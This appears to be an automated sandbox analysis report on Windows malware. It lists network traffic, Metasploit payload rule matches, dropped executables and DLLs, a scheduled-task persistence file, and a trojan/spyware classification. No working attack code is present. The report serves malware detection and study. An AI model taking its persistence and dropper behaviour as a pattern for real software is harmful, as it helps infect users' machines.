Source: unknown	Network traffic detected: HTTP traffic on port 60571 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 60467 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:60467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60481 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:60494 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:60523 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:60524 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:60527 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:60538 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:60537 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60560 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60563 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60570 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60572 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60573 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60574 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60575 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000007.00000002.2708343431.00000000120FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: 2f0cb7128a.exe, 0000000B.00000000.2624310164.0000000000782000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_e6c6c556-2
Source: 2f0cb7128a.exe, 0000000B.00000000.2624310164.0000000000782000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_18f20c92-9

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: 0d287ea527.exe.6.dr	Static PE information: section name:
Source: 0d287ea527.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: c4df60870c.exe.6.dr	Static PE information: section name:
Source: c4df60870c.exe.6.dr	Static PE information: section name: .rsrc
Source: c4df60870c.exe.6.dr	Static PE information: section name: .idata
Source: c4df60870c.exe.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name:
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name: .idata
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name:
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name: .idata
Source: random[2].exe.10.dr	Static PE information: section name:
Source: random[2].exe.10.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0095CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

6_2_0095CB97

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F478BB	0_2_00F478BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F48860	0_2_00F48860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F47049	0_2_00F47049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F431A8	0_2_00F431A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01017B6E	0_2_01017B6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F04B30	0_2_00F04B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F04DE0	0_2_00F04DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F42D10	0_2_00F42D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4779B	0_2_00F4779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F37F36	0_2_00F37F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009878BB	1_2_009878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00987049	1_2_00987049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00988860	1_2_00988860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009831A8	1_2_009831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00944B30	1_2_00944B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00944DE0	1_2_00944DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00982D10	1_2_00982D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0098779B	1_2_0098779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00977F36	1_2_00977F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009878BB	2_2_009878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00987049	2_2_00987049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00988860	2_2_00988860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009831A8	2_2_009831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00944B30	2_2_00944B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00944DE0	2_2_00944DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00982D10	2_2_00982D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0098779B	2_2_0098779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00977F36	2_2_00977F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0094E530	6_2_0094E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00966192	6_2_00966192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00988860	6_2_00988860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00944B30	6_2_00944B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00944DE0	6_2_00944DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00982D10	6_2_00982D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00960E13	6_2_00960E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00987049	6_2_00987049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009831A8	6_2_009831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00961602	6_2_00961602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0098779B	6_2_0098779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009878BB	6_2_009878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00963DF1	6_2_00963DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00977F36	6_2_00977F36
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00778A01	9_3_00778A01
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00778A01	9_3_00778A01
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00784D91	9_3_00784D91
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00790E4B	9_3_00790E4B
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00778A01	9_3_00778A01
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00778A01	9_3_00778A01

Source: Joe Sandbox View	Dropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00F180C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00957A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0095D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0095D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0095D942 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0095DF80 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00978E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 009580C0 appears 393 times

Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: No import functions for PE file found
Source: random[2].exe.10.dr	Static PE information: No import functions for PE file found

Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: Data appended to the last section found
Source: random[2].exe.10.dr	Static PE information: Data appended to the last section found

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000007.00000002.2708343431.00000000120FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: random[1].exe0.6.dr	Static PE information: Section: kwdkpzgx ZLIB complexity 0.9949805230537535
Source: c4df60870c.exe.6.dr	Static PE information: Section: kwdkpzgx ZLIB complexity 0.9949805230537535

Source: random[1].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 0d287ea527.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@81/49@84/15

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freecam[1].exe

Jump to behavior

